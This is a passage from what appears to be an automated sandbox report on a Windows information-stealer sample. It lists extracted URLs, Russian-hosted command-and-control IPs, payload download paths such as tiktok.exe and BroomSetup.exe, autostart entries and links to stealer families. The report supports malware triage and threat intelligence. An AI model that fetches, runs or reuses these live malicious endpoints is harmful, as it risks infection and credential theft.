http://185.172.128.203/tiktok.exe6=	u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/freebl3.dllE	u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp	false		high
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dllo	u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.php(;T	u5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000002.00000002.1865849409.000000000262B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.000000000577C000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003D7D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u5ek.3.exe, 00000006.00000003.2249141509.0000000002624000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
http://185.172.128.76	u5ek.0.exe, 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8c	u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/softokn3.dllY	u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://google.com	wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpO	u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://www.sqlite.org/copyright.html.	u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206231639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/z9pYkqPQ	MSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432361
Start date and time:	2024-04-26 23:08:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wxfSIz4PAi.exe renamed because original name is a hash value
Original Sample Name:	0a7871874dc7111b978e798f616211f9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 112 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.68.123.157, 72.21.81.240, 192.229.211.108, 40.126.28.21, 40.126.28.19, 40.126.28.11, 40.126.7.35, 40.126.28.13, 40.126.28.14, 40.126.28.18, 40.126.28.22, 13.85.23.206, 20.166.126.56, 20.189.173.22, 23.202.106.101, 20.9.155.145
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: wxfSIz4PAi.exe

Simulations

Behavior and APIs

Time	Type	Description
22:09:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5E5.tmp
22:09:40	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
23:09:28	API Interceptor	2x Sleep call for process: WerFault.exe modified
23:09:47	API Interceptor	2888x Sleep call for process: MSBuild.exe modified
23:10:00	API Interceptor	7709x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
23:10:23	API Interceptor	114x Sleep call for process: EGIJKEHCAK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
185.172.128.228	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=two

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
svc.iolo.com	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
note.padd.cn.com	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
iolo0.b-cdn.net	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	156.146.43.65
